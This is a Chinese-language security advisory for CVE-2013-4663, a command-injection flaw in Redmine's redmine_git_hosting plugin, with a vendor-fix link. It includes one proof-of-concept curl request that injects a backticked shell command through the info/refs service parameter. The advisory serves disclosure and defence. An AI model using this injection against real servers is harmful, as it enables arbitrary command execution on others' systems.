发布日期：2014-12-31
更新日期：2015-01-05

受影响系统：

Redmine Redmine

描述：

---

CVE(CAN) ID: CVE-2013-4663

Redmine是用Ruby开发的基于web的项目管理软件，是用ROR框架开发的一套跨平台项目管理系统。

Redmine的redmine_git_hosting插件中，git_http_controller.rb在实现上存在安全漏洞，远程攻击者通过info/refs service参数或file_exists reqfile参数的shell元字符，利用此漏洞可执行任意命令。

<*来源：Nick Blundell
  *>

测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Nick Blundell （）提供了如下测试方法：

curl -k “https://redmine.demo.com/someproject.git/info/refs?service=git-%60sleep%2010%60″

建议：

---

厂商补丁：

Redmine
-------
目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：

http://www.sec-1.com/blog/2013/redmine-git-hosting-plugin-remote-command-execution

浏览次数：2417
严重程度：0（网友投票）